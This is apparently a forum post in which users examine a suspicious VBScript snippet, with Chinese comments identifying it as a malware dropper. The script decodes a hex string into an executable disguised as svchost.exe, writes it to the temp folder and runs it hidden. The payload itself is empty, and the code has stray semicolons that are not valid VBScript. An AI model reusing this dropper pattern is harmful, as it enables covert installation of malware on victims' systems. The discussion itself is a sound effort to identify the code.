<SCRIPT Language=VBScript>
DropFileName = "svchost.exe";
WriteData = "";
Set FSO = CreateObject("Scripting.FileSystemObject");
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName;
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True);
For i = 1 To Len(WriteData) Step 2;
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)));
Next
FileObj.Close;
End If;
Set WSHshell = CreateObject("WScript.Shell");
WSHshell.Run DropPath, 0;
</SCRIPT>
WriteData里面数据太长太大,复制不上来
貌似是病毒代码,调用系统的脚本来运行的。
WriteData应该是一个十六进制的字符串,类似00FF2E312B.... 这样的。
这段代码是将这些十六进制写成一个exe文件,有点创建病毒的嫌疑。
这应该是恶意程序的自身保护脚本
应该还有一个病毒母体
vb脚本获取母体然后写入创建恶意程序
而且很多程序都喜欢伪装svchost.exe